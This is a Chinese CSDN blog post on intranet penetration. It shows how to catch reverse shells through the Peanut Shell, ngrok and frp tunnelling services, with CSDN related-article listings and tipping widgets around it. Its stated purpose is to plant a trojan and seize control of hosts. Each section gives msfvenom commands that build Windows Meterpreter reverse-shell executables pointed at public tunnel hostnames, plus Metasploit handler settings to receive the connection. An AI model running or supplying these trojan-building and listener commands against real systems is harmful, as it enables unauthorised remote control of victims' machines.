【常用代理方法-花生壳-ngrok-frp】

最新推荐文章于 2023-11-17 17:15:00 发布
最新推荐文章于 2023-11-17 17:15:00 发布
阅读量2.2k 收藏 6
点赞数
分类专栏: 内网渗透 文章标签: 服务器 网络 运维 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/126596999
版权

文章目录

前言

在我们渗透过程中,若内网主机能够出网,这时我们可以利用代理技术,上传木马拿下主机权限,下面主要介绍三种代理方法,使用的方法都差不不多。

一、花生壳

花生壳主要是做一个本地端口映射,将自己本地的某一个端口映射为公网地址的端口,使得内网主机执行木马连接到公网地址后,会转发到本地,得到回显。

1.端口映射

在这里插入图片描述
这里将kali得8080端口映射到公网地址的45528端口

2.制作木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.zicp.fun LPORT=45528 -f exe -o huashen.exe

在这里插入图片描述

3.设置监听并执行木马

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.221
set lport 8080
exploit

在这里插入图片描述

4.成功回显

在这里插入图片描述

二、ngrok

1.端口映射

在这里插入图片描述

2.制作木马

msfvenom -p windows/meterpreter/reverse_http LHOST=xxx.idcfengye.com LPORT=80 -f exe -o ngrok.exe

3.开启监听

到ngrok得目录下执行,连接服务器

./sunny clientid xxx

在这里插入图片描述

在这里插入图片描述

4.成功回显

成功接收到数据但是没有成功,应该是服务器得问题,ngrok确实不咋好用
在这里插入图片描述
在这里插入图片描述

三、frp

frp分为服务端和客户端
我们需要在公网服务器上打开frp服务,然后使用客户端连接。
本实验服务器开启服务端口为7000

1.开启客户端,连接服务器

在这里插入图片描述
在这里插入图片描述

2.制作木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx LPORT=11111 -f exe -o frp.exe

3.开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 7778
exploit

在这里插入图片描述

4.成功回显

在这里插入图片描述

总结

本期主要介绍了几种常用的代理技术,前提都得益于内网主机能够出网的情况下,不能够出网的话方法会不一样,后期会继续讨论,欢迎关注!

一纸-荒芜
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
花生壳配置代理域名访问内网API服务
巅峰键盘侠
12-21 1671
1、Nginx配置 server { listen 80; server_name localhost; root "D:/phpStudy/WWW"; location / { index index.php index.html; error_page 400 /error/400.html; error_page 403 /error/403.html; error_page 404 /error/404.html; error_page 500 /
FRP|神卓互联|Ngrok|花生壳之内网穿透技术详解
m0_74288308的博客
12-15 687
其实神卓互联和花生壳产品布局差不多,神卓互联私有云内网穿透相当成熟,客户量也是非常多,功能也比较齐全,支持 TCP、IOT、RDP、串口等主流协议以及API扩展和开发定制,单进程可动态创建6万多个场景映射通道,支持百万级并发请求。如果是⾮技术⼈⼠,你⼤可不必去折腾那些难懂的代码和程序,也⽆须公⽹ip,以上的花⽣壳或是神卓互联,相对⽽⾔是⽐较合适的,毕竟是成熟的商业化产品。
使用FileZilla搭建公网访问的ftp服务器(Frp/花生壳)
qq_25046827的博客
07-23 4556
FTP客户端使用N(N>1023)端口连接到FTP服务器的21端口,发送用户名和密码登录,登录成功后要list列表或者读取数据时,发送PASV命令到FTP服务器服务器在本地开放一个端口(1024以上),然后把开放的端口告诉客户端,客户端再通过N+1端口连接到服务器开放的端口进行数据传输。即如果自己有公网ip则可以使用frp自己设置开放哪个端口进行数据通信,没有的话则用花生壳这样的工具提供的公网和分配的端口,得到端口和公网地址之后再返回去filezilla中设置ip和端口。...
多种内网穿透工具的比较
lizhou828的专栏
04-08 2691
对比三种内网穿透工具(Sunny-Ngrok/花生壳/NatAPP),到底谁好用?内网穿透工具比较(ngrok,frp,lanproxy,goproxy,nps)花生壳(需要实名认证,免费的宽带和流量仅供测试使用,付费分别升级太贵了)国产的内网穿透工具也很优秀,这10款工具推荐正在寻找的你!NPS(需要一台带有公网IP地址的服务器)frp(需要一台带有公网IP地址的服务器)支持可视化配置的全能内网穿透神器-NPS。ngrok(本地ngrok端重启后,内网穿透工具ngrok使用教程。
Kali常见攻击手段_kali攻击
最新发布
分享Python知识
11-17 3405
Kali常见攻击手段_kali攻击
共享打印机-花生壳.docx
10-16
利用花生壳软件把本地打印机映射到因特网。
易语言-花生壳客户端通信模块
06-29
一般这种情况为本次提交的IP跟上一次的一样' notfqdn 未有激活花生壳的域名' nohost 域名不存在或未激活花生壳' abuse 请求失败,频繁请求或验证失败时会出现' badauth 验证失败,用户名或密码错误' badagent 请求的...
免费域名--花生壳绑定tomcat花生壳路由器的设置.pdf
11-27
花生壳绑定Tomcat设置详解】 花生壳是一款流行的动态域名解析服务软件,它允许用户通过免费或付费的方式获得域名,并将其绑定到家庭或公司的网络服务器上,即使IP地址是动态变化的。本教程将详细介绍如何使用花生...
Windows-Vista-IIS7花生壳2008架设WEB网站.doc
10-28
- 登录花生壳客户端,激活选定的域名,并使用域名自诊断工具检查域名是否已成功指向公网IP。 3. **建立WEB站点**: - 打开IIS管理器("开始"——"管理工具"——"Internet信息服务管理器")。 - 在IIS管理器中,...
内网穿透软件有哪些!
m0_61657030的博客
09-08 1218
..提到内网穿透,相信小伙伴们有些一知半解,到底什么是内网穿透呢!什么情况下需要内网穿透呢!接下来给大家简单的述说一下原理,内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。 总体来说,主要是用于没有公网IP ,同时并且需要别的局域网能够访问到自己家或公司的,电脑或服务器上的项目,比如公司OA办公软件,ERP 等,使用起...
花生壳实现外网访问本地项目(前后端分离)
m0_59208997的博客
02-18 2231
使用花生壳实现外网访问本地项目
Ngrok免费实现内网穿透
再小的帆也能远航,把分享变成一种习惯
02-06 6499
内网穿透是为了让本地局域网的跑的应用可以被外网访问。实现内网穿透的工具很多,基本上都是收费的,今天我们就来说一说这免费的内网穿透工具ngrok
个人电脑怎么搭建服务器 花生壳内网穿透 设置路由器虚拟服务器
dmz1981的专栏
09-18 968
内网穿透设置: 配置内网穿透,选择服务器软件的端口号,然后将其映射到您的服务器的内部IP地址和端口号。这将允许外部访问您的服务器。添加端口映射规则: 添加一个新的端口映射规则,将外部端口映射到您的服务器的内部IP地址和端口号。确保将该规则与服务器软件的端口号匹配。
通过内网穿透 将本地端口 使其外网可以进行访问 使用花生壳内网穿透 网站访问
石宗昊的博客
03-11 7997
首先本教程使用的内网穿透工具 花生壳 下载地址 https://hsk.oray.com/ 通过使用windows的软件 内网穿透技术,使得本地的服务、业务、网站、接口等在公网上可以进行访问。 开始 下载并安装注册好后如下图 点击免费激活 点击左边 弹到花生壳管理的web界面 免费版只有2个内网映射 每月1G流量 点击添加 我这里测试用 就选择了网站访问 也就是http的80端口访问 如果是业务数据端口 可以选择tcp端口访问, 但是注意不支持web访问 也不能用postman测试 但
花生壳内网穿透 利用nginx反向代理 公网访问内网的springboot项目
Meta39的博客
05-29 3844
花生壳内网穿透 利用nginx反向代理 公网访问内网的springboot项目
花生壳代理(PHP)无法获取用户ip
振很忙,真的很忙
07-29 839
1、问题描述 因为需要,所以用花生壳搭建了一个网站,但是获取到的都是内网地址(其它电脑访问网站得到的也是127.0.0.1),很正常,毕竟不是公网。但让人气愤的是花生壳官方没有给出解决方案,无语。 <?php echo $_SERVER["REMOTE_ADDR"]; ?> //输出 127.0.0.1 2、解决办法 1)通过搜狐获取用户ip <script src="http://pv.sohu.com/cityjson?ie=utf-8"></sc
内网穿透的几种方式-免费与收费(钉钉、Frp花生壳、nat123)
大新软件老杨
05-08 1万+
内网穿透的几种方式-免费与收费(钉钉、Frp花生壳、nat123)
frp实现花生壳+阿里云内网穿透,实现公有IP映射到本地(支持 TCP、UDP、HTTP、HTTPS 等多种协议)
weixin_43041894的博客
08-21 3439
一文搞懂frp内网穿透并搭建配置使用,Windows、Mac电脑远程链接!frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
Kali常见攻击手段
热门推荐
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
花生壳DDNSTL-WAR1200L
08-14
- *2* *3* [【常用代理方法-花生壳-ngrok-frp】](https://blog.csdn.net/qq_61872115/article/details/126596999)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值